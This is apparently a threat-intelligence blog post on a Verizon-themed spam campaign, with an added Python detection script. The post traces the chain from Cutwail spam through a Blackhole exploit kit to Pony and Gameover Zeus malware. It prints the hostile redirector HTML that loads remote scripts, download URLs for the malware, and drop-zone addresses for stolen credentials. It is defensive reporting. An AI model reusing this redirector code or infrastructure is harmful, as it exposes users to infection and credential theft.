Your Bill Is Now Available

We saw a return of Verizon Wireless-themed spam today. The sample in question had a subject line of “Your Bill Is Now Available” and was sent from a Cutwail spambot at 86.120.45.80.

This sample had the following malicious links:

casinhajoia.com.br/CvBvr8r9/index.html
coastcruises.com.au/nS9X51yA/index.html
ftp.chirvancontract.gr/K7qjpRQ7/index.html
enil1.home.pl/nS9X51yA/index.html
ftp.bobstudio.com.hk/LgBXz0BV/index.html

These malicious links contained the following HTML code:

<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="http://colecoesearte.com.br/Kypp5Enk/js.js"></script>
<script type="text/javascript" src="http://rafaeltezelli.com.br/G1GCPjut/js.js"></script>

These JavaScript redirectors in turn bounced victims to a Blackhole Exploit Kit landing page at wildestant.com/showthread.php?t=d7ad916d1c0396ff.

Vulnerable victims directed to the above URL at wildestant.com then downloaded a Pony downloader with the following properties:

File: about.exe
Size: 95785
MD5: 14D9C851566E0C66EF67E2C08E6866A7

This Pony downloader posted stolen FTP credentials to http://88.85.99.44:8080/pony/gate.php. The downloader was also configured to communicate with the following backup drop zones in the event the primary at 88.85.99.44 was unavailable. The backup drops were located at:

http://91.121.140.103:8080/pony/gate.php
http://91.121.178.156:8080/pony/gate.php

The Pony downloader was also configured to download a Gameover Zeus variant from the following locations:

http://gnarlybuys.info/LMbir.exe
http://karinasadvertising.com/vXFEiixu.exe
http://mancomunidadcentro.org.bo/wN7iM.exe
http://100s.pl/jQnoeUC.exe

This Gameover variant had the following properties:

Size: 262696
MD5: B818C5240F3D45A123F2A497ACA8BEA1

This Gameover variant sent stolen data to drop zones at:

188.230.92.97:15043
93.177.168.141:16115

Web injects were downloaded from 93.177.168.141:16115.
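As an added example (not code from the original post), the following Python script turns the chain described above into simple detection logic: it labels proxy log URLs that match the Blackhole landing-page pattern (showthread.php?t= followed by 16 hex characters) or the Pony gate (/pony/gate.php on port 8080), and pulls remote js.js URLs out of a captured "WAIT PLEASE" redirector page. The log format, the 8-character directory assumption for js.js, and the sample inputs are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Patterns taken from the chain described in the post:
#  - Blackhole landing page: /showthread.php?t=<16 hex chars>
#  - Pony gate: /pony/gate.php on port 8080
#  - redirector page: "WAIT PLEASE" banner plus remote js.js under an 8-char directory (assumed)
BLACKHOLE_LANDING = re.compile(r"^/showthread\.php\?t=[0-9a-f]{16}$")
PONY_GATE = re.compile(r"^/pony/gate\.php$")
REDIRECTOR_JS = re.compile(
    r"<script[^>]+src=[\"']?(https?://[^\"'\s>]+/[A-Za-z0-9]{8}/js\.js)", re.I)

def classify_url(url):
    """Label a URL as a known stage of this chain, or return None."""
    p = urlparse(url)
    path_q = p.path + ("?" + p.query if p.query else "")
    if BLACKHOLE_LANDING.search(path_q):
        return "blackhole-landing"
    if PONY_GATE.search(p.path) and p.port == 8080:
        return "pony-gate"
    return None

def scan_proxy_log(lines):
    """Scan constructed '<client> <method> <url>' lines; return (client, label, url) hits."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        label = classify_url(parts[2])
        if label:
            hits.append((parts[0], label, parts[2]))
    return hits

def find_redirector_scripts(html):
    """Return remote js.js URLs from a 'WAIT PLEASE' redirector page, else []."""
    if "WAIT PLEASE" not in html:
        return []
    return REDIRECTOR_JS.findall(html)

# Constructed sample input (not from the original post); URLs reuse the post's indicators.
SAMPLE_LOG = [
    "10.0.0.12 GET http://wildestant.com/showthread.php?t=d7ad916d1c0396ff",
    "10.0.0.12 POST http://88.85.99.44:8080/pony/gate.php",
    "10.0.0.31 GET http://forum.example/showthread.php?t=1234",
]
SAMPLE_HTML = ('<h1>WAIT PLEASE</h1><h3>Loading...</h3>'
               '<script type="text/javascript" src="http://colecoesearte.com.br/Kypp5Enk/js.js"></script>')
```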

Note that we also observed other Blackhole Exploit Kit servers at:

184.82.202.46
69.164.199.162
